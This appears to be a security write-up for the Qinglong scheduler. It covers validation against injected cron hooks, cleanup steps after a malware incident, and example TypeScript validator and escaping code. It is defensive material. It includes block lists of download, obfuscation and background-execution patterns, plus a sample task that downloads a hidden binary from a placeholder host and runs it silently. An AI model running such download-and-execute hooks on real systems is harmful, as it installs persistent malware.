# Security Enhancements

## Overview

This document describes the security enhancements implemented to prevent malicious code injection attacks in Qinglong.

## Issue Background

A security vulnerability was discovered where malicious code could be injected into the system through:

1. Cron task fields (`task_before`, `task_after`, `command`)
2. Configuration file writes (`config.sh`, `extra.sh`, etc.)

The reported incident involved a malicious script that:

- Downloaded an external binary (`.fullgc`) from a suspicious domain
- Executed the binary in the background
- Persisted by continuously re-injecting itself

## Security Fixes Implemented

### 1. Input Validation for Cron Tasks

**File:** `/back/validation/schedule.ts`

Added comprehensive validation to detect and block dangerous shell patterns:

- **Command Substitution**: Blocks `$(...)` and backtick patterns that could execute hidden commands
- **File Downloads**: Blocks `curl`, `wget`, `fetch` commands
- **External URLs**: Blocks HTTP/HTTPS URLs to prevent external resource downloads
- **Hidden Files**: Blocks references to files starting with `.` (common in malware)
- **Background Execution**: Blocks suspicious `nohup` patterns
- **Output Hiding**: Blocks redirects to `/dev/null` combined with background execution
- **Obfuscation**: Blocks `base64`, `decode`, `eval` patterns
- **Temp Directory Execution**: Blocks execution from `/tmp` or hidden directories

### 2. Config File Content Security

**File:** `/back/api/config.ts`

Enhanced validation for configuration file content to prevent:

- Downloads followed by execution (`curl | bash`, `wget | bash`)
- Download and permission changes (`curl && chmod +x`)
- Suspicious executable downloads (files like `.fullgc`)
- Background execution of hidden files

### 3. Improved Shell Escaping

**File:** `/back/services/cron.ts`

Replaced weak shell escaping with a robust `escapeShellArg()` function that:

- Properly escapes single quotes using `'\\''` pattern
- Normalizes whitespace and newlines
- Prevents command injection through various shell metacharacters

## Security Best Practices

### For Administrators

1. **Review Existing Tasks**: Audit all existing cron tasks for suspicious patterns
2. **Monitor Logs**: Check logs for security validation warnings
3. **Update Dependencies**: Keep all npm/pip dependencies up to date
4. **Limit Access**: Restrict who can create/modify cron tasks and config files
5. **Regular Backups**: Maintain backups of configuration files

### For Users

1. **Trusted Sources Only**: Only add scripts from trusted repositories
2. **Code Review**: Review any script before adding it to your cron tasks
3. **Avoid External URLs**: Don't include download commands in task hooks
4. **Report Suspicious Activity**: Report any unusual system behavior immediately

## Validation Error Messages

When the security system blocks a pattern, you'll see error messages like:

- `命令包含潜在危险的模式,已被安全系统拦截` - Command contains dangerous pattern
- `前置命令包含潜在危险的模式,已被安全系统拦截` - task_before contains dangerous pattern
- `后置命令包含潜在危险的模式,已被安全系统拦截` - task_after contains dangerous pattern
- `配置文件内容包含潜在危险的模式,已被安全系统拦截` - Config file contains dangerous pattern

## What to Do If You're Affected

If you've been affected by the malicious code injection:

### 1. Immediate Actions

```bash
# Stop and remove the malicious process
pkill -f ".fullgc"
rm -f /ql/data/db/.fullgc

# Check for the malicious code in configuration files
grep -r "fullgc" /ql/data/config/
grep -r "551911.xyz" /ql/data/config/
```

### 2. Clean Configuration Files

```bash
# Backup current configs
cp -r /ql/data/config /ql/data/config.backup

# Review and clean these files:
# - /ql/data/config/config.sh
# - /ql/data/config/extra.sh
# - /ql/data/config/task_before.sh
# - /ql/data/config/task_after.sh

# Remove any lines containing:
# - Downloads (curl, wget)
# - External URLs
# - .fullgc references
```

### 3. Review Cron Tasks

1. Log into Qinglong admin panel
2. Check all cron tasks for suspicious content in:
   - Command field
   - task_before field
   - task_after field
3. Delete or clean any suspicious tasks

### 4. Update to Patched Version

Ensure you're running a version of Qinglong with these security fixes.

### 5. Change Credentials

If you suspect compromise:

- Change your Qinglong admin password
- Review and rotate any API tokens
- Check for unauthorized access in logs

## Detection

### Log Analysis

Security events are logged to help detect attempted attacks:

```bash
# Check for security validation failures in logs
grep "安全系统拦截" /ql/data/log/*.log

# Check for suspicious file modifications
grep "配置文件写入" /ql/data/log/*.log
```

### File Integrity

Regularly check for unexpected files:

```bash
# Find hidden executables in data directory
find /ql/data -type f -name ".*" -executable

# Check for recently modified config files
find /ql/data/config -type f -mtime -1
```

## Limitations

These security measures provide defense-in-depth but are not foolproof:

- Legitimate use cases requiring downloads must use alternative methods
- Very sophisticated attacks may find bypasses
- Users with admin access can still compromise the system
- Compromised dependencies can still execute malicious code

## Reporting Security Issues

If you discover a security vulnerability, please report it responsibly:

1. Do NOT create public GitHub issues for security vulnerabilities
2. Contact the maintainers privately
3. Provide detailed information about the vulnerability
4. Allow time for a patch before public disclosure

## References

- [OWASP Command Injection](https://owasp.org/www-community/attacks/Command_Injection)
- [Shell Command Injection Prevention](https://cheatsheetseries.owasp.org/cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html)
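
## Added Example: Pattern Checks for Cron Task Fields

The categories listed under "Input Validation for Cron Tasks" can be expressed as a rule table applied to `command`, `task_before` and `task_after`. This is an added example, not the code in `/back/validation/schedule.ts`: the rule names, the regular expressions, `findViolations`, `validateCronTask` and the sample task are assumptions made for illustration.

```typescript
// Added illustration, not Qinglong's code: rule names and regexes are
// assumptions modelled on the categories this document lists.
type Rule = { name: string; pattern: RegExp };
type CronTask = { command: string; task_before?: string; task_after?: string };

const RULES: Rule[] = [
  { name: "command-substitution", pattern: /\$\(|`/ },
  { name: "file-download", pattern: /\b(curl|wget|fetch)\b/i },
  { name: "external-url", pattern: /https?:\/\//i },
  // A dot that starts a path component; "./run.sh" and "../x" are not matched.
  { name: "hidden-file", pattern: /(^|[\s\/])\.[A-Za-z0-9_]/ },
  { name: "background-nohup", pattern: /\bnohup\b/i },
  // Redirect to /dev/null on a line that ends with a backgrounding "&".
  { name: "hidden-output-background", pattern: />\s*\/dev\/null[^\n]*&\s*$/m },
  { name: "obfuscation", pattern: /\b(base64|decode|eval)\b/i },
  { name: "tmp-execution", pattern: /(^|[\s;&|])\/tmp\// },
];

// Names of every rule the value trips, in RULES order.
function findViolations(value: string): string[] {
  return RULES.filter((r) => r.pattern.test(value)).map((r) => r.name);
}

// Checks the three task fields; returns only the fields that have findings.
function validateCronTask(task: CronTask): Record<string, string[]> {
  const report: Record<string, string[]> = {};
  const fields = ["command", "task_before", "task_after"] as const;
  for (const field of fields) {
    const hits = findViolations(task[field] ?? "");
    if (hits.length > 0) report[field] = hits;
  }
  return report;
}

// Constructed sample resembling the reported incident; the host is a placeholder.
const SAMPLE_TASK: CronTask = {
  command: "task demo.js",
  task_before: "curl -o /ql/data/db/.fullgc http://example.invalid/bin",
  task_after: "nohup /ql/data/db/.fullgc >/dev/null 2>&1 &",
};

console.log(validateCronTask(SAMPLE_TASK));
```

A blocklist of this shape also rejects legitimate input such as a task argument that points at a `.env` file, which is the trade-off noted under Limitations.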
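
## Added Example: Single-Quote Shell Escaping

The escaping described under "Improved Shell Escaping" closes the quote, emits an escaped quote and reopens it for every embedded `'`. This is an added example, not the code in `/back/services/cron.ts`: `naiveQuote` is a hypothetical weak escaper shown for contrast, `decodeShellWord` is a small checker written for this example, and the body of `escapeShellArg` is an assumption based on the three properties listed above.

```typescript
// Added illustration, not Qinglong's code. naiveQuote() is a hypothetical weak
// escaper; decodeShellWord() is a checker written only for this example.

// Weak: wraps in single quotes but leaves embedded quotes untouched.
function naiveQuote(arg: string): string {
  return "'" + arg + "'";
}

// Robust: normalize whitespace and newlines, then replace every embedded
// single quote with '\'' (close quote, escaped quote, reopen quote).
function escapeShellArg(arg: string): string {
  const normalized = arg.replace(/\s+/g, " ").trim();
  return "'" + normalized.replace(/'/g, "'\\''") + "'";
}

// Reads `word` the way a POSIX shell reads single-quoted text and \' pairs.
// Returns the literal argument, or null if any character would be left
// unquoted (live shell syntax) or a quote is unterminated.
function decodeShellWord(word: string): string | null {
  let out = "";
  let i = 0;
  while (i < word.length) {
    if (word[i] === "'") {
      const end = word.indexOf("'", i + 1);
      if (end === -1) return null; // unterminated quote
      out += word.slice(i + 1, end);
      i = end + 1;
    } else if (word[i] === "\\" && word[i + 1] === "'") {
      out += "'";
      i += 2;
    } else {
      return null; // unquoted character: the shell would interpret it
    }
  }
  return out;
}

// Constructed sample input containing a quote, a newline and a metacharacter.
const SAMPLE = "it's a\ntest; echo injected";

console.log(escapeShellArg(SAMPLE), decodeShellWord(naiveQuote(SAMPLE)));
```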